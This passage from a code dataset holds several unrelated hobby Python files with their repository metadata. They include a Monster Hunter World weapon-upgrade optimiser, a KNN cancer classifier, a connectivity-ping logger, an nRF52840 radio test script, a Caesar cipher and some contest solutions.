SafiWeaponStandardUpgradeType(Enum):\n ATTACK = auto()\n AFFINITY = auto()\n #STATUS = auto() # Will implement later.\n #ELEMENT = auto() # Will implement later.\n #DEFENSE = auto() # Will implement later.\n SLOT = auto()\n SHARPNESS = auto()\n\nSafiWeaponSetBonusUpgradeTypeInfo = namedtuple(\"SafiWeaponSetBonusUpgradeTypeInfo\", [\"upgrade_name\", \"set_bonus_name\"])\nclass SafiWeaponSetBonusUpgradeType(Enum):\n TEOSTRA_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo(\"Teostra Essence\", \"TEOSTRA_TECHNIQUE\")\n TIGREX_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo(\"Tigrex Essence\", \"TIGREX_ESSENCE\")\n VELKHANA_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo(\"Velkhana Essence\", \"VELKHANA_DIVINITY\")\n # I'll add the others as I fill the database!\n\nclass SafiWeaponUpgrades(WeaponUpgradeTracker):\n\n __slots__ = [\n \"_config\",\n ]\n\n # TODO: These values are true for GS according to honeyhunterworld.com. What about other weapons?\n # level = 1 2 3 4 5 6\n _ATTACK_VALUES = (None, None, None, 7, 9, 14) # Raw added to the weapon raw. 
Other levels not yet implemented.\n _AFFINITY_VALUES = (None, None, None, 8, 10, 15) # Added affinity percentage. Other levels not yet implemented.\n _SLOT_VALUES = (None, None, 1, 2, 3, 4 ) # The level of the slot. Slot I and II don't exist.\n _SHARPNESS_VALUES = (None, None, None, 40, 50, 70) # Sharpness value added. Other levels not yet implemented.\n\n _WHITE_MAX = 120 # Maximum white sharpness value before we overflow into purple sharpness.\n _BASE_SHARPNESS = MaximumSharpness(100, 50, 50, 50, 50, 90, 0) # All Safi weapons start at this sharpness.\n\n _MAXIMIZED_CONFIG_REGULAR_PICKS = [ # TODO: Consider automating this definition.\n (SafiWeaponStandardUpgradeType.ATTACK, 5),\n (SafiWeaponStandardUpgradeType.AFFINITY, 5),\n (SafiWeaponStandardUpgradeType.SHARPNESS, 5),\n (SafiWeaponStandardUpgradeType.SLOT, 5),\n ]\n\n _MAXIMIZED_CONFIG_LEVEL_6_PICKS = [ # TODO: Consider automating this definition.\n (SafiWeaponStandardUpgradeType.ATTACK, 6),\n (SafiWeaponStandardUpgradeType.AFFINITY, 6),\n (SafiWeaponStandardUpgradeType.SHARPNESS, 6),\n (SafiWeaponStandardUpgradeType.SLOT, 6),\n ]\n\n _MAXIMIZED_CONFIG_SET_BONUS_PICKS = [(x, 1) for x in SafiWeaponSetBonusUpgradeType]\n\n def __init__(self):\n self._config = []\n assert self._state_is_valid()\n return\n\n def copy(self):\n new = copy(self)\n new._config = copy(self._config)\n assert new._state_is_valid()\n return new\n\n def get_config(self):\n return copy(self._config)\n\n def get_serialized_config(self):\n assert self._state_is_valid()\n json_serializable = [(upgrade_type.name, level) for (upgrade_type, level) in self._config]\n return json.dumps(json_serializable)\n\n def calculate_contribution(self):\n assert self._state_is_valid() # We rely on these assumptions. E.g. only one set bonus upgrade.\n\n added_attack_power = 0\n added_raw_affinity = 0\n extra_decoration_slot_level = 0\n added_sharpness_value = 0 # We turn this into new_max_sharpness_values once we have it.\n set_bonus = None\n\n for (upgrade_type, level) in self._config:\n if upgrade_type is SafiWeaponStandardUpgradeType.ATTACK:\n added_attack_power += self._ATTACK_VALUES[level - 1]\n elif upgrade_type is SafiWeaponStandardUpgradeType.AFFINITY:\n added_raw_affinity += self._AFFINITY_VALUES[level - 1]\n elif upgrade_type is SafiWeaponStandardUpgradeType.SLOT:\n extra_decoration_slot_level += self._SLOT_VALUES[level - 1]\n elif upgrade_type is SafiWeaponStandardUpgradeType.SHARPNESS:\n added_sharpness_value += self._SHARPNESS_VALUES[level - 1]\n elif isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType):\n assert set_bonus is None\n set_bonus = SetBonus[upgrade_type.value.set_bonus_name]\n else:\n raise RuntimeError(\"Not a valid Safi upgrade type.\")\n \n # Now, we calculate sharpness\n\n assert SHARPNESS_LEVEL_NAMES[5] == \"White\"\n assert SHARPNESS_LEVEL_NAMES[6] == \"Purple\"\n assert len(SHARPNESS_LEVEL_NAMES) == 7\n white_value = self._BASE_SHARPNESS[5] + added_sharpness_value\n purple_value = 0\n if white_value > self._WHITE_MAX:\n purple_value = white_value - self._WHITE_MAX\n white_value = self._WHITE_MAX\n\n new_max_sharpness_values = MaximumSharpness(\n self._BASE_SHARPNESS[0],\n self._BASE_SHARPNESS[1],\n self._BASE_SHARPNESS[2],\n self._BASE_SHARPNESS[3],\n self._BASE_SHARPNESS[4],\n white_value,\n purple_value,\n )\n\n # We've calculated everything, so now we return.\n\n ret = WeaponUpgradesContribution (\n added_attack_power = added_attack_power,\n added_raw_affinity = added_raw_affinity,\n extra_decoration_slot_level = extra_decoration_slot_level,\n 
new_max_sharpness_values = new_max_sharpness_values,\n set_bonus = set_bonus,\n )\n return ret\n\n def get_maximized_configs(self):\n maximized_configs = []\n\n it = product(\n self._MAXIMIZED_CONFIG_LEVEL_6_PICKS,\n self._MAXIMIZED_CONFIG_REGULAR_PICKS,\n self._MAXIMIZED_CONFIG_REGULAR_PICKS,\n self._MAXIMIZED_CONFIG_REGULAR_PICKS, # TODO: Make it so slot upgrades only work\n self._MAXIMIZED_CONFIG_REGULAR_PICKS + self._MAXIMIZED_CONFIG_SET_BONUS_PICKS,\n )\n for tup in it:\n config = list(tup)\n if self._is_valid_configuration(config):\n maximized_configs.append(config)\n\n return maximized_configs\n\n def update_with_config(self, selected_config):\n self._config = copy(selected_config)\n assert self._state_is_valid()\n return\n\n def update_with_serialized_config(self, serialized_config):\n json_parsed_config = json.loads(serialized_config)\n\n self._config = []\n for (upgrade_type_str, level) in json_parsed_config:\n if upgrade_type_str in SafiWeaponStandardUpgradeType.__members__:\n upgrade_type = SafiWeaponStandardUpgradeType[upgrade_type_str]\n elif upgrade_type_str in SafiWeaponSetBonusUpgradeType.__members__:\n upgrade_type = SafiWeaponSetBonusUpgradeType[upgrade_type_str]\n else:\n raise RuntimeError(\"Unknown Safi upgrade type.\")\n self._config.append((upgrade_type, level))\n\n assert self._state_is_valid() # We test for config validity here.\n return\n\n def to_str_debugging(self):\n return \",\".join(f\"{k.name}_{v}\" for (k, v) in self._config)\n\n def _state_is_valid(self):\n if len(self._config) > 5 or (not self._is_valid_configuration(self._config)):\n return False\n\n for (upgrade_type, level) in self._config:\n if not (isinstance(upgrade_type, SafiWeaponStandardUpgradeType)\n or isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType)):\n return False\n return True\n\n @classmethod\n def _is_valid_configuration(cls, config_list):\n assert len(config_list) <= 5\n\n has_slot = False\n has_set_bonus = False\n has_level_6 = False\n\n for (upgrade_type, level) in config_list:\n if upgrade_type is SafiWeaponStandardUpgradeType.SLOT:\n if has_slot:\n return False\n has_slot = True\n elif isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType):\n if has_set_bonus:\n return False\n has_set_bonus = True\n elif (level > 6) or (level < 1):\n return False\n elif level == 6:\n if has_level_6:\n return False\n has_level_6 = True\n return True\n\n\nWeaponFinalValues = namedtuple(\n \"WeaponFinalValues\",\n [\n \"original_weapon\", # The original weapon object\n\n \"true_raw\",\n \"affinity\",\n \"slots\",\n \"set_bonus\",\n \"skill\",\n \"is_raw\",\n\n \"maximum_sharpness\",\n \"constant_sharpness\",\n ],\n)\n# Calculates a weapon's final values based on all selected augments and upgrades.\ndef calculate_final_weapon_values(weapon, weapon_augments_tracker, weapon_upgrades_tracker):\n assert isinstance(weapon, tuple) # TODO: Make a more specific type assertion.\n assert isinstance(weapon_augments_tracker, WeaponAugmentTracker)\n assert isinstance(weapon_upgrades_tracker, WeaponUpgradeTracker)\n\n a_contrib = weapon_augments_tracker.calculate_contribution()\n u_contrib = weapon_upgrades_tracker.calculate_contribution()\n\n bloat_value = weapon.type.value.bloat\n weapon_true_raw = weapon.attack / bloat_value\n\n slots = weapon.slots \\\n + ((a_contrib.extra_decoration_slot_level,) if (a_contrib.extra_decoration_slot_level > 0) else tuple()) \\\n + ((u_contrib.extra_decoration_slot_level,) if (u_contrib.extra_decoration_slot_level > 0) else tuple())\n assert all((x in {1,2,3,4}) for x in 
slots)\n\n if u_contrib.new_max_sharpness_values is not None:\n maximum_sharpness = u_contrib.new_max_sharpness_values\n else:\n maximum_sharpness = weapon.maximum_sharpness\n\n tup = WeaponFinalValues(\n original_weapon = weapon,\n\n true_raw = weapon_true_raw + a_contrib.added_attack_power + u_contrib.added_attack_power,\n affinity = weapon.affinity + a_contrib.added_raw_affinity + u_contrib.added_raw_affinity,\n slots = slots,\n set_bonus = u_contrib.set_bonus,\n skill = weapon.skill,\n is_raw = weapon.is_raw,\n\n maximum_sharpness = maximum_sharpness,\n constant_sharpness = weapon.constant_sharpness\n )\n return tup\n\n\n# Decides if w1 supercedes w2.\ndef _weapon_combo_supercedes(w1, w2):\n assert isinstance(w1, WeaponFinalValues)\n assert isinstance(w2, WeaponFinalValues)\n\n # STAGE 1: We first decide if w1 has any values less than w2.\n\n if w1.true_raw < w2.true_raw:\n return False\n if w1.affinity < w2.affinity:\n return False\n \n # The logic of this slots thing is a little complex. Here's are some examples of how it works!\n # Let's assume left is w1 and right is w2.\n # [3,3] [1] --> continue since w1 is clearly better.\n # [1] [3,3] --> return False since (1 < 3) for the first element evaluates True.\n # [4,1,1] [3,3] --> return False since (1 < 3) for the second element evaluates True.\n # To explain that last example, we can't guarantee that the [3,3] jewels can be fit into [4,1,1],\n # hence we cannot prune away w2.\n w1_slots = sorted(list(w1.slots), reverse=True)\n w2_slots = sorted(list(w2.slots), reverse=True)\n assert (len(w1_slots) == 0) or (w1_slots[0] >= w1_slots[-1]) # Sanity check that it's in descending order.\n assert (len(w2_slots) == 0) or (w2_slots[0] >= w2_slots[-1]) # Sanity check that it's in descending order.\n if any((w1_slot < w2_slot) for (w1_slot, w2_slot) in zip_longest(w1_slots, w2_slots, fillvalue=0)):\n return False\n\n # We can explain this through truth tables:\n # | w2=None | w2=setbonusA | w2=setbonusB\n # -------------|----------|--------------|--------------\n # w1=None | continue | return False | return False\n # w1=setbonusA | continue | continue | return False\n # w1=setbonusB | continue | return False | continue\n # -------------|----------|--------------|--------------\n # So, we only continue if w2 is None, or the set bonuses are the same.\n if (w2.set_bonus is not None) and (w1.set_bonus is not w2.set_bonus):\n return False\n\n # For now, we just group everything by whether they are raw or not.\n # Any pair where one is raw and one isn't cannot supercede each other.\n if w1.is_raw != w2.is_raw:\n return False\n\n # We just return if any sharpness level in w1 has fewer hits than in w2.\n assert len(w1.maximum_sharpness) == len(w2.maximum_sharpness)\n if any((s1 < s2) for (s1, s2) in zip(w1.maximum_sharpness, w2.maximum_sharpness)):\n return False\n\n # STAGE 2: We now decide if w1 has anything better than w2.\n\n if w1.true_raw > w2.true_raw:\n return True\n if w1.affinity > w2.affinity:\n return True\n\n # The same as in stage 1, but the other way around!\n if any((w1_slot > w2_slot) for (w1_slot, w2_slot) in zip_longest(w1_slots, w2_slots, fillvalue=0)):\n return True\n\n # For set bonuses, let's have a look at the remaining options:\n # | w2=None | w2=setbonusA | w2=setbonusB\n # -------------|-------------|--------------|--------------\n # w1=None | continue | | \n # w1=setbonusA | return True | continue | \n # w1=setbonusB | return True | | continue\n # -------------|-------------|--------------|--------------\n # So, we will 
only continue now if both weapons have the same set bonus.\n    if w1.set_bonus is not w2.set_bonus:\n        return True\n\n    # We don't deal with is_raw. That has already been dealt with for us.\n\n    # This one is also similar to stage 1, but the other way around :)\n    if any((s1 > s2) for (s1, s2) in zip(w1.maximum_sharpness, w2.maximum_sharpness)):\n        return True\n\n    # STAGE 3: The two weapons are effectively the same.\n\n    return None\n\n\n# Returns a list of tuples (weapon, augments_tracker, upgrades_tracker)\ndef get_pruned_weapon_combos(weapon_class, health_regen_minimum):\n\n    weapon_combinations = []\n\n    for (_, weapon) in weapon_db.items():\n\n        if weapon.type is not weapon_class:\n            continue # We ignore weapons that don't match our desired weapon class.\n\n        for augments_tracker in WeaponAugmentTracker.get_maximized_trackers(weapon, health_regen_minimum=health_regen_minimum):\n            for upgrades_tracker in WeaponUpgradeTracker.get_maximized_trackers_pruned(weapon):\n                precalculated_values = calculate_final_weapon_values(weapon, augments_tracker, upgrades_tracker)\n                weapon_combinations.append(((weapon, augments_tracker, upgrades_tracker), precalculated_values))\n\n    # Now, we prune!\n\n    def left_supercedes_right(weapon1, weapon2):\n        return _weapon_combo_supercedes(weapon1[1], weapon2[1])\n\n    if __debug__:\n        fordump_before = weapon_combinations\n\n    progress = ExecutionProgress(f\"PRUNING WEAPONS -\", len(weapon_combinations), granularity=1000)\n    weapon_combinations = prune_by_superceding(weapon_combinations, left_supercedes_right, \\\n            execute_per_iteration=lambda : progress.update_and_log_progress(logger))\n\n    if __debug__:\n        fordump_after = weapon_combinations\n        dump_pruned_weapon_combos(fordump_before, fordump_after, left_supercedes_right)\n\n    weapon_combinations = [x[0] for x in weapon_combinations]\n    return weapon_combinations\n\n\ndef get_weapon_config_humanreadable(linebegin, weapon, weapon_augments_tracker, weapon_upgrades_tracker):\n    buf = []\n\n    buf.append(linebegin + weapon.name)\n\n    buf.append(\"\")\n    for (augment, level) in weapon_augments_tracker.get_config():\n        buf.append(f\"{linebegin}{augment.name} {level}\")\n    # TODO: Let the tracker print itself.\n    if isinstance(weapon_upgrades_tracker, IBCWeaponUpgradeTracker):\n        for (stage, upgrade) in enumerate(weapon_upgrades_tracker.get_config()):\n            buf.append(f\"{linebegin}Custom Upgrade: {upgrade.name} {stage+1}\")\n    elif isinstance(weapon_upgrades_tracker, SafiWeaponUpgrades):\n        for (upgrade, level) in weapon_upgrades_tracker.get_config():\n            buf.append(f\"{linebegin}Safi Awakening: {upgrade.name} {level}\")\n    return \"\\n\".join(buf)\n\n","repo_name":"simshadows/mhwi-build-search-prototype","sub_path":"src/query_weapons.py","file_name":"query_weapons.py","file_ext":"py","file_size_in_byte":36384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13125639014","text":"import numpy as np\nimport math\nfrom sklearn.metrics import f1_score\n\n\ndef load_data(fname,delimiter,dtype=None):\n    data=np.genfromtxt(fname,dtype,delimiter=delimiter)\n    X=data[1:,2:] # comma-separated; the first index selects rows, the second selects columns\n    Y=data[1:,1]\n    m=len(Y) # number of samples\n    return X,Y,m\n\ndef computeDistance(train_setX,train_setY,test_data):\n    di=np.diag_indices(len(train_setX)) # build the tuple of diagonal indices of the array\n\n    distance = np.zeros(train_setX.shape)\n    for j in range(len(train_setX)):\n        distance[j]=train_setX[j]-test_data\n    distance2=np.dot(distance,np.transpose(distance))[di]\n    distance2=np.sqrt(distance2)\n    
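# NOTE (an untested sketch, not in the original): the loop + diag trick above is one way to\n    # get row-wise Euclidean distances; an equivalent vectorized one-liner would be:\n    # distance2 = np.linalg.norm(train_setX - test_data, axis=1)\n    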
distance2=np.hstack((distance2.reshape(-1,1),train_setY.reshape(-1,1))) # merge the distance vector with the training-set Y vector (use reshape to transpose a vector; transpose() has no effect on a 1-D array)\n    sort_indices=np.argsort(distance2[...,0]) # sort by the distance column to get the sorted indices (ascending)\n    distance2=distance2[sort_indices]\n\n    return distance2\n\ndef normal_predict(sorted_distance,k,i,predict_results):\n    arraytolist=sorted_distance[:k,1].tolist()\n    types=set(arraytolist) # enumerate the distinct elements in the list\n    dict={} # use a dictionary to count the occurrences of each distinct element\n\n    for item in types:\n        dict.update({item:arraytolist.count(item)})\n    print(dict)\n\n    try:\n        if dict[b'B']>dict[b'M']:\n            result = 'B'\n        else:\n            result = 'M'\n    except KeyError as e:\n        if b'B' in types:\n            result = 'B'\n        else:\n            result = 'M'\n\n    print('Prediction for test sample {}: {}'.format(i,result))\n    predict_results[i]=(result)\n\ndef computePerformance(test_setY,predict_results):\n    print(\"\\nF1 score={}\".format(f1_score(test_setY, predict_results, average='micro')))\n\nif __name__==\"__main__\":\n    X,Y,m=load_data(\"Breast Cancer_data.csv\",\",\")\n    temp = math.ceil(m * 3 / 4)\n    train_setX = X[:temp]\n    test_setX = X[temp + 1:]\n    train_setY = Y[:temp]\n    test_setY = Y[temp + 1:]\n    train_setX = train_setX.astype(np.float_) # convert the bytes data type to float64\n    test_setX = test_setX.astype(np.float_)\n\n    predict_results = [0]*len(test_setY) # prediction results for the test set (a fixed-length list)\n\n    for i in range(test_setX.shape[0]): # predict each test sample one by one\n        sorted_distance=computeDistance(train_setX,train_setY,test_setX[i])\n        normal_predict(sorted_distance,7,i,predict_results)\n\n    test_setY=test_setY.tolist()\n    test_setY=[str(i,encoding = \"utf-8\") for i in test_setY] # bytes to str\n\n    # compute performance\n    computePerformance(test_setY,predict_results)\n","repo_name":"AnRanbel/ML","sub_path":"KNN/BreastCancerPrediction.py","file_name":"BreastCancerPrediction.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8809797544","text":"'''\nDate: 2022.09.29\nTime complexity: O(N^2)\n\nProblem: https://www.acmicpc.net/problem/11660\nApproach: \n20:25 ~ 20:59\n\nSince n's range is small, precompute a prefix-sum table\nD[i][j] = D[i-1][j] + D[i][j-1] - D[i-1][j-1] + A[i-1][j-1]\n\nTest\n4 3\n1 2 3 4\n2 3 4 5\n3 4 5 6\n4 5 6 7\n2 2 3 4\n3 4 3 4\n1 1 4 4\n'''\nimport sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\n# 1. read the grid\narr = []\nfor _ in range(n):\n    arr.append(list(map(int, input().split())))\n# 2. build the prefix-sum table\nnumbers = [[0] * (n+1) for _ in range(n+1)]\nfor i in range(1, n+1): # D[i][j] = D[i-1][j] + D[i][j-1] - D[i-1][j-1] + A[i-1][j-1]\n    for j in range(1, n+1):\n        numbers[i][j] = numbers[i-1][j] + numbers[i][j-1] - numbers[i-1][j-1] + arr[i-1][j-1]\n# print(numbers)\n# print()\n# 3. sum over the target region\nfor i in range(m): # D[x2][y2] - D[x1-1][y2] - D[x2][y1-1] + D[x1-1][y1-1]\n    x1,y1,x2,y2 = list(map(int, input().split()))\n    \n    print(numbers[x2][y2] - numbers[x1-1][y2] - numbers[x2][y1-1] + numbers[x1-1][y1-1])\n\n\n","repo_name":"Minsik113/Algorithm-practice","sub_path":"[Book1]Doit_Algorithm_Codingtest/01-구간합/004-구간 합 구하기2.py","file_name":"004-구간 합 구하기2.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22990240235","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport json\nimport time\nimport subprocess\nfrom pathlib import Path\nfrom datetime import datetime\n\n\n# Config data for the application\ndata = {}\n\n\ndef main():\n\n    # load configuration\n    load_config()\n\n\n    # Verify that the script is not running yet\n    is_running = is_already_running()\n    if is_running:\n        sys.exit(0)\n\n\n    # Ping Google's DNS server.\n    result = ping_server()\n\n    if not result:\n\n        retries = 0\n\n        while not result:\n\n            # Increment the amount of retries.\n            retries += 1\n\n            # Log the failure\n            log_failure(retries)\n\n            # Wait 2 seconds ...\n            time.sleep(2)\n\n            # Retry to ping it\n            result = ping_server()\n\n\ndef load_config():\n\n    here = os.path.dirname(os.path.realpath(__file__))\n\n    config_file_full_path = f\"{here}/config.json\"\n\n\n    with open(config_file_full_path) as config_file:\n        config = json.load(config_file)\n        data[\"script_name\"] = config[\"script_name_per_minute\"]\n        data[\"google_server\"] = config[\"google_server\"]\n        data[\"pings_log_file\"] = f\"{config['root_dir']}/{config['pings_log_file']}\"\n\n\ndef is_already_running():\n\n    # Get the current script's pid.\n    pid = str(os.getpid())\n\n    # Get the full list of process IDs for scripts with the same name.\n    command = f\"ps -ef | grep -v grep | grep {data['script_name']}\"\n    raw_processes = list(os.popen(command))\n\n    filtered_list = []\n\n    for raw_process in raw_processes:\n        process_id = str(raw_process).split()[1]\n        if process_id != pid:\n            filtered_list.append(process_id)\n\n\n    # Return the amount of process IDs\n    return len(filtered_list) > 0\n\n\ndef ping_server():\n\n    # Set the ping command.\n    ping_command = f\"/sbin/ping -c 1 {data['google_server']}\"\n\n    # Set the shell command wrapper.\n    process = subprocess.Popen(ping_command, stdout = subprocess.PIPE, stderr = subprocess.DEVNULL, shell = True)\n\n    # Launch the shell command:\n    process.communicate()\n\n    # Get the command's exit status.\n    exit_status = process.returncode\n\n    return exit_status == 0\n\n\ndef get_last_modified(log_file):\n\n    if not os.path.isfile(log_file):\n        Path(log_file).touch()\n\n    raw_file_date = time.ctime(os.path.getmtime(log_file))\n\n    file_date_array = raw_file_date.split()\n\n    # Add a 'zero' in case that the date is lower than 10\n    dom = file_date_array[2]\n\n    day_of_month = int(dom)\n\n    if day_of_month < 10:\n        dom = \"0\" + dom\n\n    file_date = f\"{file_date_array[4]}/{file_date_array[1]}/{dom}\"\n\n    # Convert the date from string to number\n    file_date = file_date.replace(\"Jan\", \"1\")\n    file_date = file_date.replace(\"Feb\", \"2\")\n    file_date = file_date.replace(\"Mar\", \"3\")\n    file_date = file_date.replace(\"Apr\", \"4\")\n    file_date = file_date.replace(\"May\", \"5\")\n    file_date = file_date.replace(\"Jun\", \"6\")\n    file_date = file_date.replace(\"Jul\", \"7\")\n    file_date = file_date.replace(\"Aug\", \"8\")\n    file_date = file_date.replace(\"Sep\", \"9\")\n    file_date = file_date.replace(\"Oct\", \"10\")\n    file_date = 
file_date.replace(\"Nov\", \"11\")\n    file_date = file_date.replace(\"Dec\", \"12\")\n\n    return file_date\n\n\ndef log_failure(retries):\n\n    log_file = data[\"pings_log_file\"]\n\n    # \"Touch\" the file, if absent.\n    if not os.path.exists(log_file):\n        open(log_file, 'a').close()\n        os.chmod(log_file, 0o666) # rw-rw-rw-\n\n    # Get the formatted 'last modified' date for the log file.\n    last_modified = get_last_modified(log_file)\n\n    # Get the current date\n    current_date = datetime.now().strftime(\"%Y/%m/%d\")\n\n    with open(log_file, \"a\") as log:\n        if not current_date == last_modified:\n            log.write(\"-\" * 60)\n            log.write(\"\\n\")\n\n        now = datetime.now().strftime(\"%Y/%m/%d_%H:%M:%S\")\n        log.write(f\"{now} - Try #{retries}\\n\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"yargolan/GolanSoft","sub_path":"Apps/Connectivity/ping_google_DNS_server.py","file_name":"ping_google_DNS_server.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5420316848","text":"# This script can be used to configure a nrf52840dk that is flashed with the radio_test program\n# to send rssi packets with the provided configuration.\n# This script is supposed to be used in tandem with rx.py\n\nimport serial\nimport nrf52840 as nrf\n\npackages = 1000 # nr of packages to be sent per transmission\n\n\ndef main():\n    port = nrf.prompt_for_serial_port()\n    with serial.Serial() as ser: # ensures opened port will be closed when leaving scope\n        ser.baudrate = nrf.baudrate\n        ser.port = port\n        ser.open()\n\n        # configure options that will not change\n        nrf.configure_start_channel(ser)\n        nrf.configure_transmit_pattern(ser)\n        ser.flush() # flush the data buffer over to the serial port\n        for i in range(0, 4):\n            print(ser.readline().decode())\n\n        while True: # loop until no more transmissions shall be performed\n            # configure options that need to be adjusted for every run\n            nrf.configure_output_power(ser)\n            nrf.configure_data_rate(ser)\n            ser.flush()\n            for i in range(0, 4):\n                print(ser.readline().decode())\n\n            while input(\"start transmission? (y, n) \") == \"y\": # start transmission with current configuration\n                nrf.start_tx(ser, packages)\n                ser.flush()\n\n                line = ser.readline().decode()\n                while line.find(\"TX has finished\") == -1: # wait till transmission has finished\n                    print(line)\n                    line = ser.readline().decode()\n                print(line)\n\n            if input(\"configure next transmission? 
(y, n) \") != \"y\":\n                break\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"blazing-panda/nrf52840-radio-test-scripts","sub_path":"src/tx.py","file_name":"tx.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12280833663","text":"\n# Program to check whether an integer is positive or negative, reporting an error if the user enters an invalid value\n\nnumero = input(\"Enter an integer: \")\ntry:\n    inum = int(numero)\nexcept ValueError:\n    print(\"Enter a valid integer\")\n    quit()\nif inum > 0:\n    print(f\"The number {inum} is positive\")\nelif inum == 0:\n    print(\"Equal to zero.\")\nelse:\n    print(f\"The number {inum} is negative\")\n\n    ","repo_name":"N0tH3r0/Programas-avulsos","sub_path":"Verificador de sinal.py","file_name":"Verificador de sinal.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15114848199","text":"from itertools import product\r\nn,a,b,c = map(int,input().split())\r\nl = [int(input()) for i in range(n)]\r\nx = list(product([0, 1, 2, 3], repeat=n))\r\nans = 10**10\r\nfor i in range(len(x)):\r\n    if x[i].count(1) == 0 or x[i].count(2) == 0 or x[i].count(3) == 0:\r\n        continue\r\n    tmpa = 0\r\n    tmpb = 0\r\n    tmpc = 0\r\n    for j in range(n):\r\n        if x[i][j] == 1:\r\n            tmpa += l[j]\r\n        if x[i][j] == 2:\r\n            tmpb += l[j]\r\n        if x[i][j] == 3:\r\n            tmpc += l[j]\r\n    tmpans = abs(a-tmpa)+abs(b-tmpb)+abs(c-tmpc)\r\n    tmpans += (x[i].count(1)-1)*10 + (x[i].count(2)-1)*10 + (x[i].count(3)-1)*10\r\n    ans = min(ans,tmpans)\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc119/C/4915372.py","file_name":"4915372.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"50563235","text":"import re, os, shutil\n\nrg = re.compile(r\"^(.*?)(\\\d)(\\\d)(\\\d)(.*?)$\") # three-digit serial number\n\n# walk through every file in the current folder\nser_num = 1\nfor filename in os.listdir('.'):\n    mo = rg.search(filename)\n\n    # skip if it doesn't match the regex\n    if mo is None:\n        continue\n\n    before_part = mo.group(1)\n    after_part = mo.group(5)\n    # skip if the file name doesn't match\n    if not(filename.startswith(before_part) and filename.endswith(after_part)):\n        continue\n\n    dig1 = int(mo.group(4))\n    dig2 = int(mo.group(3))\n    dig = -1\n    new_name = ''\n    # if the serial number has one digit\n    if 1 <= ser_num <= 9:\n        if dig1 != ser_num:\n            dig = ser_num\n            new_name = before_part + '00' + str(ser_num) + after_part\n            # print(new_name)\n    # if the serial number has two digits\n    elif 10 <= ser_num <= 99:\n        dig = str(dig2) + str(dig1)\n        print(dig)\n        if int(dig) != ser_num:\n            dig = ser_num\n            new_name = before_part + '0' + str(ser_num) + after_part\n            # print(new_name)\n\n    ser_num += 1\n    # rename the file\n    if dig != -1:\n        # print(f\"Renaming {filename} to {new_name}.\")\n        shutil.move(filename, new_name)\n","repo_name":"Shinpei2/python_source","sub_path":"automation/chapter9/9.7.3/c9.7.3.py","file_name":"c9.7.3.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15250986409","text":"def lg2(x):\r\n    i = 0\r\n    while x >= 2**i:\r\n        i += 1\r\n    return i-1\r\n\r\nfor tc in range(1, int(input())+1):\r\n    N, K = list(map(int,input().split()))\r\n    N += 1\r\n    Kpow = 2**(lg2(K)+1)\r\n    v = Kpow - K - 1\r\n    ans = (N + v)//(2**lg2(K))\r\n    print (\"Case #%d: %d %d\"%(tc,(ans-1)//2, 
(ans-2)//2))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/17/03/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"72831046953","text":"from cryptography.fernet import Fernet\nimport cryptography\n\n\ndef encrypt(plain, key):\n text = \"\"\n for char in plain:\n if (char.isupper()):\n if char.isalpha() == False:\n text +=\" \"\n else:\n text += chr((ord(char) + key-65) % 26 + 65)\n else:\n if char.isalpha()== False:\n text +=\" \"\n else:\n text += chr((ord(char) + key - 97) % 26 + 97)\n return text\n\n\ndef decrypt(encoded, key):\n return encrypt(encoded, -key)\n\n\ndef crack(message):\n key = Fernet.generate_key()\n fernet = Fernet(key)\n encrypt_message = fernet.encrypt(message.encode())\n print(\"original string: \", message)\n print(\"encrypted string: \", encrypt_message)\n decrypt_message = fernet.decrypt(encrypt_message).decode()\n \n return( decrypt_message )\n\n\nif __name__ == \"__main__\":\n \n print(encrypt(\"zzz\",1))\n crack(\"abc\")\n","repo_name":"ahmadabudames/caesar-cipher","sub_path":"caesar_cipher/caeser_cipher.py","file_name":"caeser_cipher.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16617406872","text":"# A palindromic number reads the same both ways. \n# The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\n\n# Find the largest palindrome made from the product of two 3-digit numbers.\n\ndef is_palindrome(num):\n strng = str(num)\n str_len = len(strng)\n for i in range(int(str_len/2)+1):\n if strng[i] != strng[str_len-i-1]:\n return False\n return True\n\ndef largest_palindrome_product(num):\n highest_n_digit = int(num * str(9))\n lowest_n_digit = 10 ** (num-1)\n max_num = 0\n for i in range(highest_n_digit,lowest_n_digit+1,-1):\n for j in range(i,lowest_n_digit+1,-1):\n num = i*j\n if(is_palindrome(num)):\n max_num = num if num > max_num else max_num\n \n return max_num\n \ndef main():\n num = 